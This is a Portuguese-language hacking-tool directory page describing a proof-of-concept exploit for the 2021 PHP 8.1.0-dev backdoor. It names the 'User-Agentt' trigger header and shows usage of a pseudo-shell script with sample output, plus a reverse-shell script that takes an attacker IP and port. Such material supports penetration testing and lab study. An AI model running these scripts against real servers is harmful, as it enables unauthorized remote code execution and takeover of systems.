Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/flast101/php-8.1.0-dev-backdoor-rce
ExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingFerramenta de Acesso Remoto
GitHubflast101/php-8.1.0-dev-backdoor-rce

php-8.1.0-dev-backdoor-rce

Script de Shell do Sistema com Backdoor PHP 8.1.0-dev

Ver Repositório
9421há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Backdoor no PHP 8.1.0-dev – Execução Remota de Código

Script de Shell de Sistema com Backdoor no PHP 8.1.0-dev

docs/logo_php81.png

A versão 8.1.0-dev do PHP foi lançada com um backdoor em 28 de março de 2021, mas o backdoor foi rapidamente descoberto e removido. Se esta versão do PHP estiver em execução em um servidor, um atacante pode executar código arbitrário enviando o cabeçalho User-Agentt.

O código original foi restaurado após o problema ser descoberto, mas depois foi adulterado uma segunda vez. A violação teria criado um backdoor em qualquer site que executasse a versão comprometida do PHP, permitindo que invasores realizassem execução remota de código no site.

Leia o artigo completo: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/


Script de PoC

Este pequeno script de exploit backdoor_php_8.1.0-dev.py utiliza o backdoor para fornecer um pseudo shell de sistema no host. Encontre-o no Exploit DB.

  • Título do Exploit: Backdoor no PHP 8.1.0-dev – Execução Remota de Código
  • Data: 23 de maio de 2021
  • Autor do Exploit: flast101
  • Página do Fornecedor: https://www.php.net/
  • Link do Software:
https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor
  • Testado na versão: 8.1.0-dev
  • CVE : N/A
  • Referências de vulnerabilidade:
    https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
    https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
  • Uso:

    root@kitploit:~
    ┌──(user㉿kali)-[~/Documents]
    └─$ python3 backdoor_php_8.1.0-dev.py
      
    Enter the host url:
    http://a.b.c.d
    
    Interactive shell is opened on http://a.b.c.d 
    Can't acces tty; job crontol turned off.
    $ id
    uid=1000(user) gid=1000(user) groups=1000(user)
    

    Shell Reverso

    Este pequeno script de exploit revshell_php_8.1.0-dev.py fornece um shell reverso no alvo.

    Uso:

    root@kitploit:~
    ┌──(user㉿kali)-[~/Documents]
    └─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>
    

    docs/revshell-script.png

    Seja Curioso, Aprender é Vida! 😃

    Baixar ferramenta